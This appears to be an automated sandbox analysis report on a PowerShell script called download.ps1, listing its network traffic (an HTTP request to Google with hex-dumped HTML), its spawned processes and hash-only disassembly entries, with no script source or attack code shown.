                                                                                                                            1192.168.2.649731142.250.181.132802196C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 18, 2024 20:43:16.155987024 CET159OUTGET / HTTP/1.1
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                            Host: www.google.com
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 18, 2024 20:43:17.999583006 CET1236INHTTP/1.1 200 OK
                                                                                                                            Date: Wed, 18 Dec 2024 19:43:17 GMT
                                                                                                                            Expires: -1
                                                                                                                            Cache-Control: private, max-age=0
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-4SNt4K_9HBU4WeZcG1rOcA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                            Server: gws
                                                                                                                            X-XSS-Protection: 0
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            Set-Cookie: AEC=AZ6Zc-UBx2nYeGCLSIua_jakML_ZFroRdKftWD9Ez1_lMN8t9FSwNuBODw; expires=Mon, 16-Jun-2025 19:43:17 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                            Set-Cookie: NID=520=bF7QuvEfLbYGaIbauKS7LU5l-quixdRQUjGrmS4jEP3H18YsZRksO2_niKerEFTDbtcqf_ppJ-Gv5znEireNDB21xHfwnCC0CP3iZ_QWwxn6QTuHE9q5h-FLmM3wqA6wGblyAdLGg-4BIYAF-7s9quq3jj9O6uCujbbvlK8ubnAeyirnqU1A6LZMvIf-7G0-Kfn1RTJ6; expires=Thu, 19-Jun-2025 19:43:17 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                            Accept-Ranges: none
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Data Raw: 33 32 39 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76
                                                                                                                            Data Ascii: 329d<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, v
                                                                                                                            Dec 18, 2024 20:43:17.999835968 CET1236INData Raw: 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75
                                                                                                                            Data Ascii: ideos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/log
                                                                                                                            Dec 18, 2024 20:43:17.999872923 CET1236INData Raw: 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 67 3d 7b 6b 45 49 3a 27 31 53 56 6a 5a 34 44 63 47 49 36 57 34 2d 45 50 71 64 33 59 34 51 6f 27 2c 6b 45 58 50 49 3a 27 30 2c 31 38 31 36 38 2c 33 36 38 32 30 37 36 2c 31 31 34 30 2c 33 31 36 32 32
                                                                                                                            Data Ascii: function(){var _g={kEI:'1SVjZ4DcGI6W4-EPqd3Y4Qo',kEXPI:'0,18168,3682076,1140,316223,190879,31559,2872,2891,73050,16105,201864,142932,45786,9779,99404,3801,2412,25674,25195,7734,27534,2414,9400,1632,29279,27083,5213672,433,152,5992271,2842485,9
                                                                                                                            Dec 18, 2024 20:43:18.000299931 CET1236INData Raw: 30 2c 36 38 35 2c 32 33 2c 36 35 2c 33 31 35 2c 38 2c 32 33 33 2c 33 2c 31 31 2c 34 39 33 2c 34 34 35 2c 31 2c 36 2c 33 33 39 2c 35 30 37 2c 38 38 2c 34 38 37 2c 31 35 32 2c 32 37 32 2c 32 2c 38 38 2c 36 38 35 2c 32 2c 34 34 34 2c 31 39 31 2c 36
                                                                                                                            Data Ascii: 0,685,23,65,315,8,233,3,11,493,445,1,6,339,507,88,487,152,272,2,88,685,2,444,191,643,499,33,109,603,719,78,361,55,1,437,340,343,135,10,432,33,451,1174,332,1395,469,2,6,607,1791,77,21349995,37198,18,2780,702,877,5228,43,160,553,1774,8,2065,3,12
                                                                                                                            Dec 18, 2024 20:43:18.000334024 CET704INData Raw: 49 3d 6e 3b 67 6f 6f 67 6c 65 2e 67 65 74 4c 45 49 3d 70 3b 67 6f 6f 67 6c 65 2e 6d 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 2c 63 2c
                                                                                                                            Data Ascii: I=n;google.getLEI=p;google.ml=function(){return null};google.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logU
                                                                                                                            Dec 18, 2024 20:43:18.000369072 CET1236INData Raw: 63 5d 29 7d 29 3b 76 61 72 20 68 3b 28 68 3d 67 6f 6f 67 6c 65 29 2e 6c 6f 61 64 41 6c 6c 7c 7c 28 68 2e 6c 6f 61 64 41 6c 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 67 6f 6f 67 6c 65 2e 6c 71 2e 70 75 73 68 28 5b 61 2c 62 5d 29 7d 29 3b 67
                                                                                                                            Data Ascii: c])});var h;(h=google).loadAll||(h.loadAll=function(a,b){google.lq.push([a,b])});google.bx=!1;var k;(k=google).lx||(k.lx=function(){});var l=[],m;(m=google).fce||(m.fce=function(a,b,c,n){l.push([a,b,c,n])});google.qce=l;}).call(this);google.f=
                                                                                                                            Dec 18, 2024 20:43:18.000957966 CET1236INData Raw: 65 3a 32 34 70 78 3b 68 65 69 67 68 74 3a 32 39 70 78 3b 5f 68 65 69 67 68 74 3a 33 30 70 78 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 74 65 72 3a 61 6c 70 68 61 28 6f 70 61 63 69 74 79 3d 31 30 30 29 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c
                                                                                                                            Data Ascii: e:24px;height:29px;_height:30px;opacity:1;filter:alpha(opacity=100);position:absolute;top:0;width:100%;z-index:990}#gbx3{left:0}#gbx4{right:0}#gbb{position:relative}#gbbw{left:0;position:absolute;top:30px;width:100%}.gbtcb{position:absolute;vi
                                                                                                                            Dec 18, 2024 20:43:18.000993013 CET1236INData Raw: 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 23 63 30 63 30 63 30 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 69 6e 6c 69 6e 65 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a
                                                                                                                            Data Ascii: border-color:transparent;border-top-color:#c0c0c0;display:-moz-inline-box;display:inline-block;font-size:0;height:0;line-height:0;width:0;border-width:3px 3px 0;padding-top:1px;left:4px}#gbztms1,#gbi4m1,#gbi4s,#gbi4t{zoom:1}.gbtc,.gbmc,.gbmcc{
                                                                                                                            Dec 18, 2024 20:43:18.001027107 CET1236INData Raw: 62 74 6f 20 2e 67 62 67 74 20 2e 67 62 74 62 32 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 30 7d 2e 67 62 74 62 20 2e 67 62 74 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63
                                                                                                                            Data Ascii: bto .gbgt .gbtb2{border-top-width:0}.gbtb .gbts{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/b8_3615d64d.png);background-position:-27px -22px;border:0;font-size:0;padding:29
                                                                                                                            Dec 18, 2024 20:43:18.001610041 CET704INData Raw: 23 67 62 6d 70 69 64 2c 23 67 62 6d 70 69 77 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67
                                                                                                                            Data Ascii: #gbmpid,#gbmpiw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/image
                                                                                                                            Dec 18, 2024 20:43:18.119579077 CET1236INData Raw: 3a 76 69 73 69 74 65 64 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 30 20 31 30 70 78 7d 2e 67 62 6d 6c 31 2c 2e 67 62 6d 6c 62 2c 2e 67 62 6d 6c 31 3a 76 69 73 69 74 65 64 2c 2e 67 62 6d 6c 62 3a 76 69
                                                                                                                            Data Ascii: :visited{display:inline-block;margin:0 10px}.gbml1,.gbmlb,.gbml1:visited,.gbmlb:visited{*display:inline}.gbml1,.gbml1:visited{padding:0 10px}.gbml1-hvr,.gbml1:focus{outline:none;text-decoration:underline !important}#gbpm .gbml1{display:inline;


                                                                                                                            Statistics

                                                                                                                            CPU Usage

                                                                                                                            Click to jump to process

                                                                                                                            Memory Usage

                                                                                                                            Click to jump to process

                                                                                                                            High Level Behavior Distribution

                                                                                                                            Click to dive into process behavior distribution

                                                                                                                            Behavior

                                                                                                                            Click to jump to process

                                                                                                                            System Behavior

                                                                                                                            General

                                                                                                                            Target ID:0
                                                                                                                            Start time:14:43:06
                                                                                                                            Start date:18/12/2024
                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                                                                            Imagebase:0x7ff6e3d50000
                                                                                                                            File size:452'608 bytes
                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:1
                                                                                                                            Start time:14:43:06
                                                                                                                            Start date:18/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:11
                                                                                                                            Start time:14:43:32
                                                                                                                            Start date:18/12/2024
                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                            Imagebase:0x7ff7403e0000
                                                                                                                            File size:55'320 bytes
                                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:false

                                                                                                                            Disassembly

                                                                                                                            Reset < >

                                                                                                                              Executed Functions

                                                                                                                              Function 00007FFD34817E06 Relevance: .5, Instructions: 475COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2325851541.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34800000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a408f41f76cf450993fc18aba4b8d4661a98235eae95e4a10944cb9c6369bccd
                                                                                                                              • Instruction ID: 81bc6eb4eb43713d598f5fad8859d39c872ef52fa069cb31ad9ccf94b2082fb3
                                                                                                                              • Opcode Fuzzy Hash: a408f41f76cf450993fc18aba4b8d4661a98235eae95e4a10944cb9c6369bccd
                                                                                                                              • Instruction Fuzzy Hash: D2F19630A08A8D8FEBA8DF28C8567E977E1FF55310F04466EE84DC7291CB389945CB81
                                                                                                                              Function 00007FFD34818BB2 Relevance: .5, Instructions: 461COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2325851541.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34800000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c7f99a40fdecb5fb24d482b29be3f61ae3c4522e020f1f2aad72eac4b8c69d0e
                                                                                                                              • Instruction ID: f05d23e05d55ceddde693130cec97af42b54c9a5eeeacf90d8b5cd5d32a816ad
                                                                                                                              • Opcode Fuzzy Hash: c7f99a40fdecb5fb24d482b29be3f61ae3c4522e020f1f2aad72eac4b8c69d0e
                                                                                                                              • Instruction Fuzzy Hash: 49E19530A08A8D8FEBA8DF28C8967E977E1EF55310F04466ED84DC7291DF789945CB81
                                                                                                                              Function 00007FFD34AB2E6B Relevance: .4, Instructions: 412COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2331730318.00007FFD34AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34AB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34ab0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 963355e9762f431fb2d30deb4d04ea8581112c8d0b5e585ab2885f4a7b175a49
                                                                                                                              • Instruction ID: 077742f08cb36c54dd9a5902250e4a97d4262906c76d68e910d337cb6e90f45d
                                                                                                                              • Opcode Fuzzy Hash: 963355e9762f431fb2d30deb4d04ea8581112c8d0b5e585ab2885f4a7b175a49
                                                                                                                              • Instruction Fuzzy Hash: BBC14362A0EBC50FE7968B7C98A46613FE1EF57214B1D01EBC489CB1A3D98D9C46C352
                                                                                                                              Function 00007FFD34812780 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2325851541.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34800000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: %M_L
                                                                                                                              • API String ID: 0-2359546531
                                                                                                                              • Opcode ID: 30c20083a258720c1288a97cc95ef079fbee6fbe31a07a211c6de3c386bf8340
                                                                                                                              • Instruction ID: df5e0a9bf24a5ec18ece813dc57fbe86f5d56b0277bffba7e962319e7f8cd504
                                                                                                                              • Opcode Fuzzy Hash: 30c20083a258720c1288a97cc95ef079fbee6fbe31a07a211c6de3c386bf8340
                                                                                                                              • Instruction Fuzzy Hash: D6413B71A0CBC84FDB198B5C9C5A5B97FE0EB5A320F0441BFE088D3293CA24A815C7D2
                                                                                                                              Function 00007FFD348187C6 Relevance: .3, Instructions: 333COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2325851541.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34800000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b821b8cc6d9281b84abe42a33d7fdee66a52a86da6d81ea42c9858a8d3ae217a
                                                                                                                              • Instruction ID: 14e47a5cccd3f0870ecd2317ecfd1723613cd8e1ef9a500f8f54b794aa894505
                                                                                                                              • Opcode Fuzzy Hash: b821b8cc6d9281b84abe42a33d7fdee66a52a86da6d81ea42c9858a8d3ae217a
                                                                                                                              • Instruction Fuzzy Hash: 0EB1963060CA8D8FDB69DF28D8567E93BE1FF55350F04426EE84DC7292CA789945CB82
                                                                                                                              Function 00007FFD346EE620 Relevance: .1, Instructions: 127COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2324975621.00007FFD346ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346ED000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd346ed000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 19be4507560c8014636a81c404739d84083282628c1ddaee21f95349f3d01918
                                                                                                                              • Instruction ID: 7aef006baa02864e1be6ab27452aed6897abf6d4f0e6fb1aec9096dbdd96a1d9
                                                                                                                              • Opcode Fuzzy Hash: 19be4507560c8014636a81c404739d84083282628c1ddaee21f95349f3d01918
                                                                                                                              • Instruction Fuzzy Hash: F541497050DBC48FE7569B38D8559923FF0EF53320B1901EFD088CB0A3D629A846C7A2
                                                                                                                              Function 00007FFD34812C78 Relevance: .1, Instructions: 102COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2325851541.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34800000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5ae5f92f468d0733f115e91782417c7341bc03aa3e7b00356deda7781a662725
                                                                                                                              • Instruction ID: 8c3c81d4622fc2cb263dbe082783322c75a988e3c1227032330be22587fa023b
                                                                                                                              • Opcode Fuzzy Hash: 5ae5f92f468d0733f115e91782417c7341bc03aa3e7b00356deda7781a662725
                                                                                                                              • Instruction Fuzzy Hash: ED21493090CB4C4FDB58DF9CD88A7E97BE0EB96321F00426FD048C3152CA749456CB91
                                                                                                                              Function 00007FFD348182C4 Relevance: .1, Instructions: 92COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2325851541.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34800000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: eb8dd9428c19d2e11800872440816804ad2366a8eacb1fc0eacea251e9b39494
                                                                                                                              • Instruction ID: 6a9ada1801223e7673a2a36380991ddfbe4471d80f49024110d54f58a49e75ed
                                                                                                                              • Opcode Fuzzy Hash: eb8dd9428c19d2e11800872440816804ad2366a8eacb1fc0eacea251e9b39494
                                                                                                                              • Instruction Fuzzy Hash: 4B314030A1854D8EFBB4DF18CC6ABF83291FF46318F44153AD50DC6082CA3C6985DB11
                                                                                                                              Function 00007FFD34805675 Relevance: .0, Instructions: 49COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2325851541.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34800000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 561cdfff6d0ba7e14d648c57dba9d7c719ad949a33057165d4482dc443437060
                                                                                                                              • Instruction ID: f9d634dd1828af2aabb85f4137a3db4b4b0f982b2d25e44ed07250cb2400f5d0
                                                                                                                              • Opcode Fuzzy Hash: 561cdfff6d0ba7e14d648c57dba9d7c719ad949a33057165d4482dc443437060
                                                                                                                              • Instruction Fuzzy Hash: D801447121CB084FD744EF0CE451AA9B7E0FB95364F10056EE58AC3655D626E881CB45
                                                                                                                              Function 00007FFD34AB1DD2 Relevance: .0, Instructions: 39COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2331730318.00007FFD34AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34AB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34ab0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f7c354fa382c1cf53907cf30f2a8cdec15dd54cdd8259c9570d762e0016f10c4
                                                                                                                              • Instruction ID: 62c9f7b3180262e916ff8cfce87ae84a3cce830807a37ec23a2b87046110bf98
                                                                                                                              • Opcode Fuzzy Hash: f7c354fa382c1cf53907cf30f2a8cdec15dd54cdd8259c9570d762e0016f10c4
                                                                                                                              • Instruction Fuzzy Hash: 98F0B432B0C5444FD754EB4CE4959A473E0FF06324B2400B6E14DC7467DE2AAC41C780
                                                                                                                              Function 00007FFD34812AC0 Relevance: .0, Instructions: 34COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2325851541.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34800000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 72a12473fc7a88ac892a13cf5259e549de3dd6d0c2b6cc9b211055866e1ed5ac
                                                                                                                              • Instruction ID: 0fbc06a44a708168889cb940bf6e866cf1c18353cf49545dfb9d93f20d0e0058
                                                                                                                              • Opcode Fuzzy Hash: 72a12473fc7a88ac892a13cf5259e549de3dd6d0c2b6cc9b211055866e1ed5ac
                                                                                                                              • Instruction Fuzzy Hash: 9CF0B4308186898FDB05DF2488195E57BA0FF26210B05029BE458C71B2EB34A454CB92

                                                                                                                              Non-executed Functions

                                                                                                                              Function 00007FFD3480F1D3 Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2325851541.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34800000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RM_^
                                                                                                                              • API String ID: 0-2314353614
                                                                                                                              • Opcode ID: d8a6782894d7ee4e52644e4ad908705fc82c0b2cf75dbca104392d0808fb55a6
                                                                                                                              • Instruction ID: 75ca7932e6656bb85c5dd12fd2ba253384d30cd42ce0cf6476fc783a8f6a394c
                                                                                                                              • Opcode Fuzzy Hash: d8a6782894d7ee4e52644e4ad908705fc82c0b2cf75dbca104392d0808fb55a6
                                                                                                                              • Instruction Fuzzy Hash: 2E61AF17B1C926A6F62277FDB8650EE6758DF82335B0883B7D24CCD0839D1928CA47E5
                                                                                                                              Function 00007FFD34A54521 Relevance: .4, Instructions: 364COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2331072089.00007FFD34A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A50000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34a50000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: dc81088dd637e603d09119795722a06d92a1c82cdcbed172a40ef083e395465b
                                                                                                                              • Instruction ID: 510bf7bd2009e89c01a1298353d984dfd77a3b4230dd37aff48b87653e76329d
                                                                                                                              • Opcode Fuzzy Hash: dc81088dd637e603d09119795722a06d92a1c82cdcbed172a40ef083e395465b
                                                                                                                              • Instruction Fuzzy Hash: 76B1B321A4EBC54FDB46CA3988A4A613FE1EF67314B1900EBC589CB1A3D91DDC46C751
                                                                                                                              Function 00007FFD3480C8E5 Relevance: .3, Instructions: 327COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2325851541.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34800000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d78a285dd26613e41ed6f215f38d4a62ef214db1474a571521a2d7bef9772307
                                                                                                                              • Instruction ID: 56720ea08b6d9d77248961fb445546a980be909ee317c6dee19bb50bfbf40865
                                                                                                                              • Opcode Fuzzy Hash: d78a285dd26613e41ed6f215f38d4a62ef214db1474a571521a2d7bef9772307
                                                                                                                              • Instruction Fuzzy Hash: 2DA1B453B2E6866FF7669B6C98F60E97B90DF53220B0901F7C688CA0D3ED1C28469251
                                                                                                                              Function 00007FFD34810D13 Relevance: .3, Instructions: 312COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2325851541.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34800000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 690c155d446397afb7b8bc235caa01552e5eb623dbde1a6ba11b8ffa400bee45
                                                                                                                              • Instruction ID: e49c02732da28d77b841a479006e78e6f775c98f231df5f3d11ebc989b5a4077
                                                                                                                              • Opcode Fuzzy Hash: 690c155d446397afb7b8bc235caa01552e5eb623dbde1a6ba11b8ffa400bee45
                                                                                                                              • Instruction Fuzzy Hash: 8491A197B0EAC24EE6535B2D2CF50E53B90EF6325574A02F7C6D5CB093ED0E6807A621
                                                                                                                              Function 00007FFD3480C955 Relevance: .1, Instructions: 122COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2325851541.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34800000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e94e8928af7fbbad16ae6fb5c2f4f20f365c3fb0dff5cb36c436d2171c040d30
